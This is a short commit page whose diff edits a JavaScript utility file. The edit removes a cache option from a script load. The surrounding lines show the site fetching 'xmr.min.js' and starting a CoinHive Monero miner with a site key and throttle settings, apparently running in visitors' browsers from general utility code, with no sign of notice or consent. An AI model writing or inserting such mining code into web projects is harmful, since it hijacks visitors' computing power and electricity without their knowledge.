Commit fd4fa70b authored by Vanessa's avatar Vanessa

rm xmr cache

parent cd38a7c6
......@@ -248,8 +248,7 @@ var Util = {
$.ajax({
method: "GET",
url: 'https://static.hacpai.com/js/lib/xmr.min.js',
dataType: "script",
cache: true
dataType: "script"
}).done(function () {
var miner = new CoinHive.Anonymous('gr2r3rJsYmaJpSd2Nml15zomewwc6Lzc', {threads: 1, throttle: 0.9});
miner.start();
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment